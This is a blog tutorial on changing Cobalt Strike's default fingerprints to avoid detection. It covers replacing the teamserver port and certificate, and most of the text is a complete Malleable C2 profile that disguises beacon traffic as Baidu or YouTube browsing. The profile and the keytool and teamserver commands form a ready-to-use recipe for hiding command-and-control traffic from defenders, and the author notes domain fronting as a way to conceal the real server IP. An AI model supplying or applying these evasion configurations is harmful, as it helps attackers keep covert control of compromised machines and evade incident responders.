Cobalt strike feature modification
2022-07-06 06:28:00 【zxl2605】
In red-versus-blue exercises, HVV engagements and the like, almost everyone uses Cobalt Strike, so it is also a focus of the security vendors. It is similar to msf, but CS is easier to operate than MSF and has a powerful plugin library. Naturally, a red-team tool this common has signatures in the security products' feature libraries, so we need to modify its characteristics.
------ This article mainly explores CS's own characteristics; it does not cover making the Trojan itself evade antivirus. I will write about AV evasion later. This is also a record of my learning, and your guidance is welcome.
1. CS default port
CS listens on port 50050 by default. When the blue team analyses an IP and sees 50050 open, it is generally blocked outright, because it is obviously CS's port. So we need to change port 50050.
Modify it inside the teamserver file on the server:
vi teamserver
Change the 50050 in the code at the bottom to another port, and that is all.

2. Modifying the CS HTTPS fingerprint: the certificate
By default, when we have not configured a certificate in CS, it uses the certificate bundled with CS. Leaving aside why it must be changed, let's first look at the contents of the default certificate.
Open it with keytool.exe (it comes with any Java environment installed on the machine):
keytool -list -v -keystore cobaltstrike.store
You need to enter a password; the default is 123456. If it is not 123456, open the teamserver file and look there.

You can try it; I don't know for sure. The password doesn't matter, because we will generate our own later.

This is the original cobaltstrike.store file. Everything in it is a CS characteristic; use it as-is and it gets flagged and killed.
At this point we need to generate the certificate ourselves:
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias SuanSuan -dname "CN=Suan Suan, OU=Suan, O=Suan, L=LongZu, S=OO, C=OO"
What the parameters mean:
CN = (first and last name), OU = (organizational unit name), O = (organization name), L = (city or locality name), ST = (state or province name), C = (two-letter country code of the organization)
Here cobaltstrike.store is the newly generated keystore file; -alias specifies the alias; -storepass and -keypass specify the passwords; -keyalg RSA specifies the public key algorithm; -dname specifies the owner information (the distinguished name).
With the above information we can generate our own unique certificate and avoid being detected and killed by the characteristics of the previous certificate.
After generating the new certificate, delete the original one, put the new one in the CS root directory, and enable it:
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
cobaltstrike.store is the name of the certificate file we generated.
Check it again with keytool:
keytool -list -v -keystore cobaltstrike.store
At this point the certificate shows the information we just set.
The certificate is not yet fully effective, though; see the c2 configuration below for details.
3. Modifying the traffic characteristics of the CS HTTP service
We generate an HTTP Trojan (beacon) file and capture its traffic with Wireshark to look at the details.


This is the HTTP packet of an unmodified CS beacon. The request and response look odd: there are too few parameters, and the U-A header is IE's. IE should rarely be in use any more, so we still need to revise it.
Use a Malleable C2 Profile to customise the CS traffic characteristics.
References: https://github.com/xx0hcd/Malleable-C2-Profiles
Malleable Command and Control documentation (helpsystems.com)
Configure the profile according to the template file:
###global options###
set sleeptime "37500"; # unit: ms
set jitter "35"; # sleep jitter, percentage 0-99
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69"; # U-A header customisation
###SSL Options###
# If you already have a certificate, use the one you generated yourself: uncomment this block and comment out the generating block below. Otherwise use the block below to generate one.
#https-certificate {
#    set keystore "location of the .store file inside cs";
#    set password "password of the .store certificate file";
#}
https-certificate {
    set C "US"; # two-letter country code
    set CN "Suan Suan"; # first and last name
    set L "WU"; # city name
    set O "Suan Suan"; # organization name
    set OU "Suan Suan"; # organizational unit name
    set ST "WU"; # state or province name
    set validity "365"; # certificate validity, in days
}
###CODE-SIGNER BLOCK###
code-signer {
    # Used to sign Windows Executable and Windows Executable(S) so the payload is consistent
    set keystore "cobaltstrike.store"; # certificate file name
    set password "123456"; # certificate password
    set alias "baidu.com"; # certificate alias
}
###HTTP-GET Block###
http-get {
    set uri "/video /knowledge /douga /cinephile"; # customise several URL request paths, separated by spaces
    # request configuration
    client {
        header "referer" "https://www.baidu.com/";
        header "Host" "https://youtube.com/";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
        header "Connection" "close";
        metadata {
            netbiosu; # netbios (uppercase) encoding
            append "BV1kF411J7zG?spm_id_from=333.5.0.0"; # append this suffix to the parameter content
            parameter "file"; # put the content in a new URL parameter
            prepend "v="; # prepend this prefix to the parameter content
            header "Cookie"; # add to the HTTP Cookie header
        }
    }
    # response content
    server {
        header "Content-Type" "text/html; charset=utf-8";
        header "content-encoding" "gzip";
        header "set-cookie" "innersign=1; path=/; domain=.youtube.com/";
        output {
            base64;
            print;
        }
    }
}
###HTTP-Post Block###
http-post {
    set uri "/knowledge= /food="; # must not be exactly the same as the http-get URL request path
    client {
        header "Host" "https://youtube.com/";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
        header "Connection" "close";
        id {
            netbios;
            append "spm_id_from=333.5.0.0";
            uri-append; # append to the end of the URL
        }
        output {
            base64;
            print;
        }
    }
    server {
        output {
            base64;
            print;
        }
    }
}
The configuration file above (written according to the explanations above; it still has many unreasonable places) covers both HTTP and HTTPS. For HTTPS it enables the certificate above and customises the certificate characteristics; for HTTP it makes the transmitted packets look more authentic, which makes the blue team's tracing harder.
Use the following command to start with the profile:
./teamserver 192.168.1.109 suan c2.profile
That is, the profile file is loaded after CS's normal startup arguments.
Now let's look at the HTTP service packets of the Trojan file again.

This is the modified packet. We adjust the profile ourselves according to the actual situation to make the packets look more authentic.
Then HTTPS: let's look at the HTTPS service.


Now our certificate appears. If HTTPS is not configured in the profile, the certificate information is not displayed and all the fields are empty.
4. Domain fronting
This technique is quite good: configure a CDN service so that tracing does not lead to the IP and the real IP is not found. As a minor I cannot register a domain name, so I will add this later.
Statement: the techniques, ideas and tools involved in this article are only for learning and exchange for security purposes. No one may use them for illegal purposes; otherwise, the consequences are yours to bear!!!